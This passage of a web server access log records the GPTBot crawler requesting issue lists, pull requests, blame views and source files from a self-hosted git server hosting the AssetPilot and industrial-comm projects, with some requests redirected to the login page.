"https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:59:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:59:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:17:59:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:59:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:17:59:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10221] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:59:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10225] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:17:59:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10244] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:17:59:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:17:59:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10222] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:59:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:17:59:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:17:59:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10248] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:17:59:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=oldest&state=open&type=all" -[17/Feb/2026:17:59:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10251] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:17:59:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10238] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:17:59:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10235] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:17:59:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10255] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:17:59:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:17:59:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10235] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:17:59:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10251] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:17:59:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10239] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:17:59:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10249] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:17:59:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10255] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:17:59:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10222] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:17:59:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:17:59:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:59:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:17:59:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10251] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:17:59:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10239] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:17:59:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10248] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:17:59:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10248] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:17:59:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10245] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:17:59:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:17:59:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10243] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:17:59:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10247] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:17:59:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10255] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:17:59:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10049] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build" -[17/Feb/2026:17:59:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 13441] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate.fish" -[17/Feb/2026:17:59:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 10672] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/uvicorn" -[17/Feb/2026:17:59:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9994] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:17:59:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=rendered" [Client 74.7.227.38] [Length 11081] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:17:59:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/data_format.hpp?display=rendered" [Client 74.7.227.38] [Length 11048] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:17:59:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=rendered" [Client 74.7.227.38] [Length 11027] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:17:59:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 12963] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:17:59:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/data_format.hpp?display=rendered" [Client 74.7.227.38] [Length 11046] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:17:59:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13009] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:17:59:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:17:59:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake" [Client 74.7.227.38] [Length 10118] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1" -[17/Feb/2026:17:59:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/activate.fish" -[17/Feb/2026:17:59:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/activate.fish" -[17/Feb/2026:17:59:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/uvicorn" -[17/Feb/2026:17:59:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/uvicorn" -[17/Feb/2026:17:59:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/activate.fish" -[17/Feb/2026:17:59:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/activate.fish" -[17/Feb/2026:17:59:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/uvicorn" -[17/Feb/2026:17:59:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/uvicorn" -[17/Feb/2026:17:59:33 +0000] - 200 200 - GET https 